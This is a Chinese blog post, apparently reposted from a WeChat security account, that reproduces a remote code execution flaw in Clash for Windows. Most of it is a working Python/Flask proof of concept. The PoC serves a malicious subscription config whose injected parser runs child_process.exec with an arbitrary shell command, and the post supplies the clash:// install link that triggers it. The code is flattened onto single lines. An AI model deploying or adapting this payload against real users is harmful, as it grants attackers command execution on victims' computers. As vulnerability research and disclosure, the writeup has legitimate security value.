clash最新RCE复现

admin 2023年1月15日01:16:44评论237 views字数 1621阅读5分24秒阅读模式



clash最新RCE复现


ZAC安全

#2023#

        先祝大家新年快乐,发几张星球优惠,然后就是昨天水群看到clash又双叒叕爆RCE了,于是简单复现下

clash最新RCE复现

   正文:

https://github.com/Fndroid/clash_for_windows_pkg/issues/3891

        上面要生成俩文件然后可以公网访问,订阅之后即可RCE,这里用大哥写的一个脚本(省的自己弄文件和环境了)

host = '127.0.0.1'shell = 'cmd.exe /c ping scqie.log.cve.ink'
print('[+Run Shell] ' + shell)print('[+Payload] clash://install-config?url=http://{}/config.yaml'.format(host))paylad = """payload:-DOMAIN-SUFFIX,acl4.ssr,全球直连showNewVersionIcon: truehideAfterStartup: falserandomControllerPort: truerunTimeFormat: "hh : mm : ss"trayOrders: - -icon - -status    -traffic    -texthideTrayIcon: falseconnShowProcess: trueshowTrayProxyDelayIndicator: trueprofileParsersText: >- parsers: -reg: .* code: module.exports.parse = async (raw, { axios, yaml, notify, console }, {name, url, interval, selected }) => { require("child_process").exec(""""+shell+""""); return raw; }"""from flask import Flaskapp = Flask(__name__)@app.route('/config.yaml')def index(): return """port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:  -name: a   type: socks5  server: 127.0.0.1   port: "17938"   skip-cert-verify: truerule-providers: p: type: http behavior: domain url: "http://{}/cfw-settings.yaml" path: ./cfw-settings.yaml interval: 86400""".format(host)@app.route('/cfw-settings.yaml')def cfw(): return payladif __name__ == '__main__': app.run(host=host, port=80, debug=True)

        复制这个poc,然后打开

clash最新RCE复现

        然后重启clash即可看到dnslog成功回显

clash最新RCE复现

        可以看到parse中成功改成了我们的恶意payload

clash最新RCE复现

        而原理其实也很简单,我们观看官方文档即可发现parse支持js

clash最新RCE复现

        那么因为执行js代码会有隐患,可关键在于clash是由electron搭建的,所以可以轻易的用child_process进行RCE

clash最新RCE复现


宣传页

ZAC安全

本人微信:zacaq999 
文章内容如有任何错误或者对不上号的,可以加我微信,感谢各位大佬们的指点

安全宝典欢迎各位大佬以投稿方式免费进入!


clash最新RCE复现






原文始发于微信公众号(ZAC安全):clash最新RCE复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月15日01:16:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   clash最新RCE复现https://cn-sec.com/archives/1518161.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息